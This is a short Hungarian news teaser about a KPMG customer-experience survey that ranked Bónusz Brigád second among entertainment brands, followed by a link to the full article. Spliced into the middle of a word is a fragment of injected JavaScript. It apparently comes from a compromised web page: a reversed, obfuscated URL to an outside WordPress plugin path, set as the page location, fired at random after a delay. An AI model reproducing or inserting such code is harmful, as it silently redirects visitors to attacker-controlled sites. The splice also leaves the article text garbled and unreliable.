Idén először Magyarországon is elkészítette a KPMG azt a reprezentatív felmérést, amely az ügyfélélmény szempontjából rangsorolja nyolc iparág 50 szereplőjét. Hat kulcstényező mentén mérte fel a legnagyobb brandek fogyasztói megítélését a KPMG – a szórakoztatóipar kategóriában a Bónusz Brigád a második helyen végzett.A magyar fogyasztók többségénél az ár, illetve az ár-érték viszonya az egyik legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb szempont, ám a KPMG évek óta folyó kutatási eredményei alapján úgy tűnik, hogy a vásárlási élmény egyre inkább átveszi a döntés fő tényezőjét, kevésbé racionális síkra terelve a vásárlásokat – Magyarország még ennek az útnak az elején jár. Hat kulcstényezővel kapcsolatban összesen háromezer embert kérdeztek, akiknek…
A cikk folytatódik: http://sikeresceg.co.hu/akiknek-sikerult/2018/12/14/a-bonusz-brigad-a-legjobbak-kozott.html
- Hirdetés -